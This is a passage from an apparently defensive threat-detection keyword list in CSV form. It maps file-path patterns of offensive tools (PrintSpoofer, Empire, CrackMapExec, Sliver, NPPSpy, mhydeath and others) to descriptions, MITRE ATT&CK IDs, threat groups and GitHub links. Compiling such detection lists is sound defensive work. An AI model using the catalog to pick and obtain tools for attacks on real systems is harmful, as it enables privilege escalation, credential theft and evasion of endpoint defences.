T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/PrintSpoofer.git*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*/PrintSpoofer.git*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*/PrintSpoofer/*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*/Priv_Esc.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/privesc/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*/PrivExchange*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*/PrivExchange.git*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*/PrivFu.git*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*/PrivilegeEscalation/*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/Privileger.git*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*/PrivKit.git*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*/PrivKit/*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*/proberbyte.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/process_herpaderping/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/process_killer.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/processhacker-*-bin.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/processhacker/files/latest/download*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/Process-Instrumentation-Syscall-Hook*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/ProduKey.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/prometheus.exe,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*/protocols/ftp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/ldap.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/mssql.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/rdp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/rdp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/smb.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/ssh.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/proxy/Tor.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/proxy/tor_paths.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/Proxy_Def_File_Generator.cna*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*/proxychains.git*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*/proxymaybeshell*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ps_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/ps1_oneliner.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PS2EXE.git*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*/ps2exe.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/PS2EXE/*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*/ps-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/psexec.json*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/psnuffle*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PSpersist.git*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*/pspy -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/PSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/pspy.git*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/pspy.go*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/pspy/cmd*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/pspy32*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - 